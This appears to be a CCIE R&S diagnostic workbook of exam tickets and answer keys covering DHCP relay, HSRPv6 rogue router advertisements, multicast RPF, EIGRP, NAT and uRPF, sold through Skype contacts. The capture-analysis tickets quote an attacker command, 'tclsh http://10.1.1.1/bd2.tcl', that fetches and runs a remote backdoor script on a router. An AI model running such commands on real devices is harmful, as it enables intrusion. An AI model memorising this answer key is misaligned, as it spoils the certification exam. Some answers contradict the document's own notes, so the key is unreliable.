
Ccie4career.com Skype ID 1: ccie04final Skype ID 2: nguyenbich279

CCIE4CAREER.COM - CCIE RS V5.0 DIAG WORKBOOK
CCIE4career.com

Document Information
Author: Combat C4C, CC Dreamer C4C
Please Contact: Skype ID1: ccie04final (NOT live:ccie04final), Skype ID2: nguyenbich279 (NOT live:nguyenbich279)
Change Authority: Advanced Team Focus
Version: 1.5
Date updated: 4/16/2019
Comment History: Updated Solution

* Note: live:ccie04final and live:nguyenbich279 are falsified versions of our Skype IDs. Please avoid entering incorrect IDs.

CONTENTS
1. H3
1.1 Ticket 1
1.2 Ticket 2
2. H3+
2.1 Ticket 1
2.2 Ticket 2
3. H2
3.1 Ticket 1
3.2 Ticket 2
4. H2+
4.1 Ticket 1
4.2 Ticket 2
5. H1
5.1 Ticket 1
5.2 Ticket 2
5.3 Ticket 3
6. H1+
6.1 Ticket 1
6.2 Ticket 2
6.3 Ticket 3

CCIE4Career.com
The best solution, very clear Workbook. The best way you can get CCIE Certificate.


1. H3
1.1 Ticket 1

Problem: Server 1 cannot get an IP address


SW3#show ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
none
DHCP snooping is operational on following VLANs:
none
DHCP snooping is configured on the following L3 Interfaces:

Insertion of option 82 is enabled


circuit-id default format: vlan-mod-port
remote-id: aabb.cc00.6000 (MAC)
Option 82 on untrusted port is not allowed
Verification of hwaddr field is enabled
Verification of giaddr field is enabled
DHCP snooping trust/rate is configured on the following Interfaces:

Interface Trusted Allow option Rate limit (pps)


----------------------- ------- ------------ ----------------


Question 1:

Which material is most helpful?

Answer:

Device: SW1

Command: show ip dhcp relay information trusted-sources

Question 2:

Which packets can help you find the cause?

Answer:

Seq: 113, the packet is a DHCP Discover; the source IP address of the relay agent is 0.0.0.0

Question 3:

Where on the topology should the packets be captured?

Answer:

Between SW1-SW3

// How to find sequence 113 (or another sequence) to answer Question 2:

You have a CloudShark file; filter it with the display filter “bootp” (in Wireshark 3.0 and later the filter is named “dhcp”). Find the first DHCP Discover packet and select it. Take your sequence number from that packet. (You can see that option 82 is present and that the relay agent (GIADDR) address is 0.0.0.0.)

1.2 1.1.x Ticket 1 Variation

Problem: Helpdesk for DHCP issue

Question 1: Which packets can help you find the cause (issue)?

Sequence: 114

// Find this packet by using the “bootp” filter in CloudShark/Wireshark.

Question 2: Why did you choose the above packet?

Source IP of the relay agent is 0.0.0.0 (the packet is a DHCP Discover).

// Check that packet and you will see this source address.

Question 3: Where on the topology should the packet be captured?

Between SW1-SW3

1.3 Ticket 2
The material is a packet capture. You can find the capture at this link: C4C DIAG Packet Capture

Please check video: DIAG-C4C-Int.mp4

Question 1:

What does the capture effectively show? Select all that apply.

TCP Connection from the router to 10.1.1.2

TCP Connection from the router to 10.1.1.1

TCP Connection from 10.1.1.1 to one of the router’s VTY.

TCP Connection from a remote host to the router’s IP address 10.1.1.2 on port 1337.

TCP Connection from a remote host to the router’s IP address 10.1.1.1 on port 1337.

Download of a TCL script in memory via HTTPs

Download of a TCL script in memory via HTTP

Installation of ransomware via a backdoor.

Answer:

TCP Connection from the router to 10.1.1.1

TCP Connection from a remote host to the router’s IP address 10.1.1.2 on port 1337.

Download of a TCL script in memory via HTTP

Installation of ransomware via a backdoor.

// Theory for this case:

TCP connection from the router to the hacker

TCP connection from a remote host to the victim router’s IP address on port 1337

The key here is to find out which IP address belongs to the hacker and which belongs to the victim, using CloudShark/Wireshark.

Use the display filter “http.request.method == "GET"”: the source that issues the GET is the victim, and the destination is the hacker.

Question 2:

Which command, if issued from the hacker's end, can bring down the complete system?

We have many options:

Sharkfest

Su env

Poweroff

Answer:

Poweroff

// How to find this command in CloudShark/Wireshark:



Method 1 : tcp.stream eq 4

The result of that is


Method 2 : search by tcp.port == 3001 or tcp.port == 1337

Question 3:

Which command is the attacker using?

Answer:

tclsh http://10.1.1.1/bd2.tcl

// The command here is “tclsh http://<hacker_ip_address>/bd2.tcl”, where the hacker IP address is the result from Question 1.

2. H3+
2.1 Ticket 1


Problem: Server 1 cannot get an IP address


SW3#show ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
none
DHCP snooping is operational on following VLANs:
none
DHCP snooping is configured on the following L3 Interfaces:

Insertion of option 82 is enabled


circuit-id default format: vlan-mod-port
remote-id: aabb.cc00.6000 (MAC)
Option 82 on untrusted port is not allowed
Verification of hwaddr field is enabled
Verification of giaddr field is enabled
DHCP snooping trust/rate is configured on the following Interfaces:

Interface Trusted Allow option Rate limit (pps)


----------------------- ------- ------------ ----------------

Question 1:

Which material is most helpful?

Answer:

Command: show ip dhcp relay information trusted-sources

Note: No device is chosen.

Question 2:

Which packets can help you find the cause?

Answer:

Seq: 114, the packet is a DHCP Discover; the source IP address is 0.0.0.0

Question 3:

Where on the topology should the packets be captured?

Answer:

Between SW1-SW3

// Finding the sequence number for Question 2 here is the same as in H3 Ticket 1, Question 2 above.

2.2 Ticket 2
The material is a packet capture. You can find the capture at this link: C4C DIAG Packet Capture

Please check video: DIAG-C4C-Int.mp4

Question 1:

What does the capture effectively show? Select all that apply.

TCP Connection from the router to 10.1.1.2

TCP Connection from the router to 10.1.1.1

TCP Connection from a remote host to the router’s IP address 10.1.1.2 on port 1337.

TCP Connection from a remote host to the router’s IP address 10.1.1.1 on port 1337.

Download of a TCL script in memory via HTTPs

Download of a TCL script in memory via HTTP

Installation of ransomware via a backdoor.

Note: H3+ has 9 options, but choose 4.

Answer:

TCP Connection from the router to 10.1.1.2

TCP Connection from a remote host to the router’s IP address 10.1.1.1 on port 1337.

Download of a TCL script in memory via HTTP

Installation of ransomware via a backdoor.

Question 2:

Which command, if issued from the hacker's end, can bring down the complete system?

We have many options:

Sharkfest

Su env

Poweroff

Answer:

Poweroff

Question 3:

Which command is the attacker using?

Answer:

tclsh http://10.1.1.2/bd2.tcl

// For CloudShark/Wireshark practice, you can do the same as in the H3 ticket above.

3. H2
3.1 Ticket 1

The customer has just set up an IPv6 network, with HSRPv6 on R1 & R2. After the setup, all hosts lost connectivity. What would you recommend to your L1 engineer as a quick fix?

CE1 key configuration
standby 1 priority 200
standby 1 preempt
ipv6 nd router-preference low

CE2 key configuration
standby 1 preempt
ipv6 nd router-preference high

Description:

No IPv6 connectivity from the LAN to the Internet. CE1 and CE2 are configured in HSRP for IPv6. CE1 is Active with router-preference Low and HSRP priority 200; CE2 is Standby with router-preference High and HSRP priority 100. HSRP preemption is configured on both.

Issue:

Check the console logs on the host: the default route is pointing to FE80::666. (The router with the higher router-preference should have been configured with the higher HSRP priority. Only one router in the HSRP group is active, and the current Active HSRP router has “Low” router-preference, but there is a rogue device in the LAN with the better “Medium” router-preference, so hosts use the ND RA information from the rogue device and select it as their gateway.)

Question 1:

How can the problem be fixed quickly?

Shutdown the link between CE2 and PE2.

Shutdown the link between CE1 and PE1.

Configure CE1 with highest HSRPv6 Priority.

Configure CE2 with highest HSRPv6 priority.

Configure CE2 with low HSRPv6 priority.

Shutdown CE1 interface e0/0.

Shutdown PE2 interface e0/0.

Disable fast-switching on CE’s LAN.

Enable fast-switching on CE’s LAN.

Change HSRPv1 to HSRPv2 version

Answer:

Configure CE2 with highest HSRP priority. (Make its priority higher than CE1’s 200, so that it becomes the Active HSRP router and starts sending Router Advertisements with router-preference High.)

Question 2:

What is the root cause of the current problem? Which device?

Cause of the current problem?

ARP snooping.

Routing issue.

Access-list blocking.

Default-gateway is link local address.

High preference gateway information is sent out.

HSRP device is configured with High priority.

Wrong HSRP configuration.

Missing default-gateway.

Device?

CE1

CE2

PE1

PE2

Host1

Host2

CE_DC

Server

Unknown device in CE’s LAN.

Unknown device in MPLS Core

Answer:

Cause of the current problem? Wrong HSRPv6 configuration.

Which device: CE1


Question 3:

Choose the first frame ID that demonstrates your suspicion.

Answer:

Active: #193

Wireshark line: RA from FE80::666

// Below is an example to help you find the frame number in CloudShark/Wireshark.

Use the display filter “icmpv6.type==134” or “icmpv6.nd.ra.flag.prf” in CloudShark/Wireshark; the first RA frame is the answer.

You can find the capture at this link: C4C DIAG Packet Capture

Or use another command


3.2 Ticket 2

You are working in the network team, and one of your responsibilities is to solve problems. There was a problem in the multicast network this morning, and R3 cannot use IPTV services. (It can be R2 as well.)

Question 1:

What is the issue?

Answer:

R3 has no route to RP.

Question 2:

What will you ask your engineer?

Answer:

Why is 10.4.1.0 not in R3’s RIB?

Question 3:

How can the current issue be dealt with temporarily?

Answer:

R3(config)# ip mroute 10.4.1.1 255.255.255.255 10.0.0.17

// If that command is not among the options, choose:

R3(config)# ip route 10.4.1.1 255.255.255.255 10.0.0.17

4. H2+
4.1 Ticket 1

The customer has just set up an IPv6 network, with HSRPv6 on R1 & R2. After the setup, all hosts lost connectivity. What would you recommend to your L1 engineer as a quick fix?

CE1 key configuration
standby 1 priority 200
standby 1 preempt
ipv6 nd router-preference low
standby version 2

CE2 key configuration
standby 1 preempt
ipv6 nd router-preference high
standby version 2

Description:

No IPv6 connectivity from the LAN to the Internet. CE1 and CE2 are configured in HSRP for IPv6. CE1 is Active with router-preference Low and HSRP priority 200; CE2 is Standby with router-preference High and HSRP priority 100. HSRP preemption is configured on both.

Issue:

Check the console logs on the host: the default route is pointing to FE80::666. (The router with the higher router-preference should have been configured with the higher HSRP priority. Only one router in the HSRP group is active, and the current Active HSRP router has “Low” router-preference, but there is a rogue device in the LAN with the better “Medium” router-preference, so hosts use the ND RA information from the rogue device and select it as their gateway.)

Question 1:

How can the problem be fixed quickly?

1. Shutdown the link between CE2 and PE2.

2. Shutdown the link between CE1 and PE1.

3. Configure CE1 with highest HSRPv6 Priority.

4. Configure CE2 with low HSRPv6 priority.

5. Shutdown CE1 interface e0/0.

6. Shutdown PE2 interface e0/0.

7. Disable fast-switching on CE’s LAN.

8. Enable fast-switching on CE’s LAN.

9. Change HSRPv1 to HSRPv2 version

Answer:

Shutdown CE1 interface e0/0.

Question 2:

What is the root cause of the current problem? Which device?

Cause of the current problem?

1. ARP snooping.

2. Routing issue.

3. Access-list blocking.

4. Default-gateway is link local address.

5. High preference gateway information is sent out.

6. HSRP device is configured with High priority.

7. Wrong HSRP configuration.

8. Missing default-gateway.

Device?

1. CE1

2. CE2

3. PE1

4. PE2

5. Host1

6. Host2

7. CE_DC

8. Server

9. Unknown device in CE’s LAN.

10. Unknown device in MPLS Core

Answer:

Cause of the current problem?

High preference gateway information is sent out.

Which device:

Unknown device in CE’s LAN.

Question 3:

Choose the first frame ID that demonstrates your suspicion.

Answer:

Active: #227

Wireshark line: 227-RA FE80::666

// Use the same method as in H2 Ticket 1 to find the frame number.

You can find the capture at this link: C4C DIAG Packet Capture


4.2 Ticket 2

You are working in the network team, and one of your responsibilities is to solve problems. There was a problem in the multicast network this morning, and R3 cannot use IPTV services. (It can be R2 as well.)

On R2, show ip pim rp shows that the RP is 0.0.0.0.

Question 1:

What is the issue?

Answer:

R2 has no route to RP.

Question 2:

What will you ask your engineer?

Answer:

Why is 10.4.1.0 not in R2’s RIB?

Question 3:

How can the current issue be dealt with temporarily?

Answer:

R2(config)# ip mroute 10.4.1.1 255.255.255.255 10.0.0.17

// If that command is not among the options, choose:

R2(config)# ip route 10.4.1.1 255.255.255.255 10.0.0.17

5. H1
5.1 Ticket 1

Escalation from ACME Helpdesk:

A PC cannot get an IP address or access the network after a maintenance. During the maintenance yesterday, SW3 was replaced by a new switch, and the tier 1 engineer copied the output of show run and pasted it to the new device. The tier 1 engineer thinks it may be a spanning-tree or VTP problem. Choose where and what information you need to troubleshoot the problem.

Some output from Cisco:

SW1/SW2/SW3/SW4
interface Ethernet0/1
switchport trunk encapsulation dot1q
switchport mode trunk
!
interface Ethernet0/2
switchport trunk encapsulation dot1q
switchport mode trunk

SW3
interface Ethernet1/0
switchport access vlan 10
switchport mode access
switchport port-security
switchport port-security mac-address aabb.cc00.2111


SW3
SW2#show ip int br
Interface      IP-Address   OK?  Method  Status  Protocol
Ethernet0/0    unassigned   YES  unset   down    down
Ethernet0/1    unassigned   YES  unset   up      up
Ethernet0/2    unassigned   YES  unset   up      up
Ethernet0/3    unassigned   YES  unset   up      up
Ethernet1/0    unassigned   YES  unset   up      up
Ethernet1/1    unassigned   YES  unset   up      up
Ethernet1/2    unassigned   YES  unset   up      up
Ethernet1/3    unassigned   YES  unset   up      up

Question 1:

Which of the provided materials best helps you determine the fault? Indicate which command, executed on which device, provides the most important information about the possible cause of this issue.

Answer:

Device: SW3.

Command line: show ip interface brief.

Question 2:

Indicate which information, collected on which device, you require from the helpdesk in order to confirm your suspicion.

Answer:

Collect on device: Host1

Required information: What is the MAC address of Ethernet0/0?


5.2 Ticket 2

Logging Message
%DUAL-5_NBRCHANGE: EIGRP-IPv4 200: neighbor 215.0.0.17 (Tunnel0) is up: new adjacency
%DUAL-5_NBRCHANGE: EIGRP-IPv4 200: neighbor 215.0.0.17 (Tunnel0) is down: holding time expired
%DUAL-5_NBRCHANGE: EIGRP-IPv4 200: neighbor 215.0.0.18 (Tunnel0) is up: new adjacency
%DUAL-5_NBRCHANGE: EIGRP-IPv4 200: neighbor 215.0.0.18 (Tunnel0) is down: holding time expired
%DUAL-5_NBRCHANGE: EIGRP-IPv4 200: neighbor 215.0.0.19 (Tunnel0) is up: new adjacency
%DUAL-5_NBRCHANGE: EIGRP-IPv4 200: neighbor 215.0.0.19 (Tunnel0) is down: holding time expired

R16
interface Ethernet0/1
ip address 145.67.89.14 255.255.255.252
duplex auto
speed auto
!
router eigrp 200
network 200.100.0.6 0.0.0.0
network 200.100.0.17 0.0.0.0
network 200.100.0.3 0.0.0.0
redistribute connected metric 1 1 1 1 1

R15

router eigrp 200
network 200.15.15.15 0.0.0.0
network 200.100.0.1 0.0.0.0
network 200.100.0.5 0.0.0.0
network 200.100.0.9 0.0.0.0
network 215.0.0.1 0.0.0.0
redistribute connected metric 1 1 1 1 1

Question 1:

After considering all the information provided, point and click on the device that is responsible for causing the reported symptoms.

Answer:

R15

Question 2:

Recommend a possible solution to this issue, as well as the device on which it must be configured:

Answer:

Exclude the IP prefix of E0/0 from EIGRP

5.3 Ticket 3

R1
interface FastEthernet0/0
ip nat inside
interface FastEthernet0/1
ip nat inside
interface FastEthernet1/0
ip nat outside
interface FastEthernet0/0
ip nat outside
interface loopback 11
ip address 11.11.11.11 255.255.255.255
interface loopback 12
ip address 12.12.12.12 255.255.255.255
access-list 1 permit 10.1.0.0 0.0.255.255
access-list 2 permit 10.2.0.0 0.0.255.255
ip nat inside source list 1 interface loopback 11 overload
ip nat inside source list 2 interface loopback 12 overload

PC1
interface FastEthernet0/0
ip address 10.1.1.1 255.255.255.0

PC2
interface FastEthernet0/0
ip address 10.2.1.1 255.255.255.0

PC1 ping to 1.2.3.4 is not successful.

PC2 ping to 1.2.3.4 is successful.

Question 1:

uRPF has been configured. The link between PE1 and CE is the main link; the link between PE2 and CE is a backup link. After the main link failed, inside users cannot get access through the backup link. Select the troubleshooting steps.

1. R1 looks up its RIB and selects interface e2/0 as the egress interface.

2. R1 translates the source IP address to its interface loopback 11.

3. R1 transmits the packet via interface e2/0.

4. Packets are received by R3 and are forwarded to the destination.

5. The destination replies with an ICMP echo reply.

6. The echo reply is routed via R2.

7. R2 transmits the echo reply to R1.

8. Unicast RPF on R1 drops the echo reply.

9. Packets are received by R3 and are forwarded to the destination.

10. Packets are received by R2 and are forwarded to the destination.

11. R1 looks up its RIB and selects interface E1/0 as the egress interface.

12. R3 transmits the echo reply to R1.

13. R2 and R3 drop the packet due to missing routing information for the destination.

14. The destination does not reply with an ICMP echo reply.

15. R2 transmits the echo reply to R1.

16. R1 transmits the packet via interface e1/0.

17. R2 and R3 drop the packet due to missing routing information for the source.

18. R1 transmits the packet via interface e2/0.

19. Unicast RPF on R1 drops the echo reply.

20. R1 translates the source IP address to its interface Lo 12.

21. R1 looks up its RIB and selects interface e2/0 as the egress interface.

22. An access-list on R1 drops the echo reply.

23. The destination replies with an ICMP echo reply.

24. The echo reply is routed via R3.

25. The echo reply is routed via R2.

26. T1 translates the source IP address to its interface loopback 11.

Answer:

1. R1 looks up its RIB and selects interface E2/0 as the egress interface.

2. R1 translates the source IP address to its interface lo 11.

3. R1 transmits the packet via interface E2/0.

4. Packets are received by R3 and are forwarded to the destination.

5. The destination replies with an ICMP echo reply.

6. The echo reply is routed via R2.

7. R2 transmits the echo reply to R1.

8. Unicast RPF on R1 drops the echo reply.

Question 2:

What is the most likely cause of the problem?

1. Asymmetric routing with Unicast RPF.

2. Traffic dropped due to missing routing information.

3. Routing loop due to wrong BGP community configuration.

4. Traffic dropped by access-list

5. Traffic dropped due to oversubscribed input queue.

6. Traffic dropped due to oversubscribed output queue.

7. Traffic dropped due to NAT misconfiguration.

Answer:

Asymmetric routing with Unicast RPF.

6. H1+
6.1 Ticket 1

Escalation from ACME Helpdesk:

A PC cannot get an IP address or access the network after a maintenance. During the maintenance yesterday, SW3 was replaced by a new switch, and the tier 1 engineer copied the output of show run and pasted it to the new device. The tier 1 engineer thinks it may be a spanning-tree or VTP problem. Choose where and what information you need to troubleshoot the problem.

Some output from Cisco:

SW1/SW2/SW3/SW4
interface Ethernet0/1
switchport trunk encapsulation dot1q
switchport mode trunk
!

interface Ethernet0/2
switchport trunk encapsulation dot1q
switchport mode trunk

SW3
interface Ethernet1/0
switchport access vlan 10
switchport mode access

Question 1:

Which of the provided materials best helps you determine the fault? Indicate which command, executed on which device, provides the most important information about the possible cause of this issue.

Answer:

Device: SW3.

Command line: show spanning-tree summary

Question 2:

Indicate which information, collected on which device, you require from the helpdesk in order to confirm your suspicion.

Answer:

Collect on device: SW3

Required information: show vtp password

6.2 Ticket 2


Logging Message
%DUAL-5_NBRCHANGE: EIGRP-IPv4 200: neighbor 215.0.0.17 (Tunnel0) is up: new adjacency
%DUAL-5_NBRCHANGE: EIGRP-IPv4 200: neighbor 215.0.0.17 (Tunnel0) is down: holding time expired
%DUAL-5_NBRCHANGE: EIGRP-IPv4 200: neighbor 215.0.0.18 (Tunnel0) is up: new adjacency
%DUAL-5_NBRCHANGE: EIGRP-IPv4 200: neighbor 215.0.0.18 (Tunnel0) is down: holding time expired
%DUAL-5_NBRCHANGE: EIGRP-IPv4 200: neighbor 215.0.0.19 (Tunnel0) is up: new adjacency
%DUAL-5_NBRCHANGE: EIGRP-IPv4 200: neighbor 215.0.0.19 (Tunnel0) is down: holding time expired

R16
interface Ethernet0/1
ip address 145.67.89.14 255.255.255.248
duplex auto
speed auto
!
router eigrp 200
network 200.100.0.6 0.0.0.0
network 200.100.0.17 0.0.0.0
network 200.100.0.3 0.0.0.0
redistribute connected metric 1 1 1 1 1

R15
router eigrp 200
network 200.15.15.15 0.0.0.0
network 200.100.0.1 0.0.0.0
network 200.100.0.5 0.0.0.0
network 200.100.0.9 0.0.0.0
network 215.0.0.1 0.0.0.0
redistribute bgp 65200 metric 1 1 1 1 1 route-map CCIE
ip prefix-list CCIE seq 5 permit 0.0.0.0/0
route-map CCIE permit 10
match ip address prefix-list CCIE

Question 1:

After considering all the information provided, point and click on the device that is responsible for causing the reported symptoms.

Answer:

R16

Question 2:

Recommend a possible solution to this issue, as well as the device on which it must be configured:

Answer:

Increase the mask length of R16 interface e0/0

6.3 Ticket 3

R1
interface FastEthernet0/0
ip nat inside
interface FastEthernet0/1
ip nat inside
interface FastEthernet1/0
ip nat outside
interface FastEthernet0/0
ip nat outside
interface loopback 11
ip address 11.11.11.11 255.255.255.255
interface loopback 12
ip address 12.12.12.12 255.255.255.255
access-list 1 permit 10.1.0.0 0.0.255.255
access-list 2 permit 10.2.0.0 0.0.255.255
ip nat inside source list 1 interface loopback 11 overload
ip nat inside source list 2 interface loopback 12 overload

PC1
interface FastEthernet0/0
ip address 10.1.1.1 255.255.255.0

PC2
interface FastEthernet0/0
ip address 10.2.1.1 255.255.255.0

PC1 ping to 1.2.3.4 is not successful.

PC2 ping to 1.2.3.4 is successful.

Note:

1. R1 is configured for eBGP multipath and uRPF loose mode; it uses per-destination load balancing.

2. R2 and R3 are both in uRPF strict mode; they prefer the route to Loopback 11 and Loopback 12 via R3-R1.

3. Logs on R1 (show ip cef exact-route <hosts> <internet>) show that if the path is towards R2, the packet is dropped on R2; if the path is towards R3, it will NOT be dropped.

Question 1:

uRPF has been configured. The link between PE1 and CE is the main link; the link between PE2 and CE is a backup link. After the main link failed, inside users cannot get access through the backup link. Select the troubleshooting steps.

1. R1 determines there are multiple paths to the destination based on per-destination.

2. R1 determines there is a single path to the destination based on per-destination.

3. R1 determines R3 as adjacency via F2/0.

4. R1 determines R2 as adjacency via F1/0.

5. R1 checks its ACL and decides the (destination) IP address needs to be translated.

6. R1 sends packets via F1/0

7. R1 sends packets via F2/0

8. R3 receives the packet, checks it against its own ACL and determines R2 as the destination.

9. R2 receives the packet, checks it against its own ACL and determines R1 as the destination.

10. R3 forwards the packet to R2 and R2 sends it back to R3, back and forth.

11. R2 forwards the packet to R3 and R3 sends it back to R2, back and forth.

12. R2 drops the packet.

13. R3 drops the packet.

14. URPF fail

15. Netflow fail

Answer:

1. R1 determines there is a single path to the destination based on per-destination.

2. R1 determines R3 as adjacency via F2/0.

3. R1 checks its ACL and decides the (destination) IP address needs to be translated.

4. R1 sends packets via F2/0

5. R3 receives the packet, checks it against its own ACL and determines R2 as the destination.

6. R2 receives the packet, checks it against its own ACL and determines R1 as the destination.

7. R2 drops the packet.

8. URPF fail

Question 2:

What is the most likely cause of the problem?

Answer:

Strict unicast RPF dropping packets and per-destination load-balancing.
